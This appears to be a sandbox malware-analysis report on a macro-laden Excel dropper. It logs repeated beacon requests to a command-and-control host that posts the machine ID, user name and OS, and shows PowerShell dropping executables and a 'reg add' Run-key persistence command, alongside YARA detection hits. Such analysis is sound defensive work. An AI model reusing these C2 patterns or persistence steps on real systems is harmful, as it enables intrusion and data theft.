Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161

Source: unknown

DNS traffic detected: queries for: cutt.ly

Source: unknown

HTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheData Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional

Source: powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 0000000E.00000002.2115049708.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.c
Source: powershell.exe, 00000007.00000002.2117026131.000000000020A000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanenTZ
Source: powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.2116902605.00000000001DE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Document image extraction number: 0	Screenshot OCR: Enable Editing from the yellow bar above 3. Once you have enabled editing, please click Enable Co
Source: Document image extraction number: 0	Screenshot OCR: Enable Content from the yellow bar above
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing from the yellow bar above 3. Once you have enabled editing, please click Enable Co
Source: Document image extraction number: 1	Screenshot OCR: Enable Content from the yellow bar above

Found Excel 4.0 Macro with suspicious formulas

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Initial sample: EXEC

Found obfuscated Excel 4.0 Macro

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

Initial sample: High usage of CHAR() function: 21

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\ps.exe

Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory allocated: 76D20000 page execute and read and write

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1DF6 NtQuerySystemInformation,	24_2_00AD1DF6
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1DC5 NtQuerySystemInformation,	24_2_00AD1DC5
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F31D66 NtQuerySystemInformation,	32_2_01F31D66
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F31D30 NtQuerySystemInformation,	32_2_01F31D30

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A0F79	24_2_004A0F79
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A2840	24_2_004A2840
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A2832	24_2_004A2832
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A25F0	24_2_004A25F0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_004A57CC	24_2_004A57CC
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0040C090	27_2_0040C090
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_0041A390	27_2_0041A390
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00414C70	27_2_00414C70
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00410C10	27_2_00410C10
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00411270	27_2_00411270
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_004136C0	27_2_004136C0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 27_2_00417A93	27_2_00417A93
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C0F79	32_2_003C0F79
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C2834	32_2_003C2834
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C2840	32_2_003C2840
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C25F0	32_2_003C25F0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_003C57CC	32_2_003C57CC
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_00400F87	39_2_00400F87
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_00402840	39_2_00402840
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_00402832	39_2_00402832
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_004025F0	39_2_004025F0
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_004057CC	39_2_004057CC

Document contains embedded VBA macros

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls

OLE indicator, VBA macros: true

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: String function: 0042AFA0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: String function: 0040FCB0 appears 97 times

PE file contains strange resources

Source: ps.exe.23.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: GvthaHtVzpRh.exe.24.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost.exe.27.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Uses reg.exe to modify the Windows registry

Source: unknown

Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe

Yara signature match

Source: 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: dump.pcap, type: PCAP	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: C:\Users\user\Documents\pd.bat, type: DROPPED	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research

Source: ps.exe.23.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: GvthaHtVzpRh.exe.24.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: svchost.exe.27.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@60/23@4/3

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1C7A AdjustTokenPrivileges,	24_2_00AD1C7A
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 24_2_00AD1C43 AdjustTokenPrivileges,	24_2_00AD1C43
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F31806 AdjustTokenPrivileges,	32_2_01F31806
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 32_2_01F317CF AdjustTokenPrivileges,	32_2_01F317CF
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_006B1806 AdjustTokenPrivileges,	39_2_006B1806
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 39_2_006B17CF AdjustTokenPrivileges,	39_2_006B17CF

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\D4FE0000

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mtx_pthr_locked_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListMax_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-rwl_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_static_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_sch_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idList_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_global_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListCnt_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_once_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_obj_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_dest_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\lCYThKzk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-global_lock_spinlock
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListNextId_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mxattr_recursive_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_max_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-cond_locked_shmem_rwlock
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_lock_shmem
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-pthr_root_shmem

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

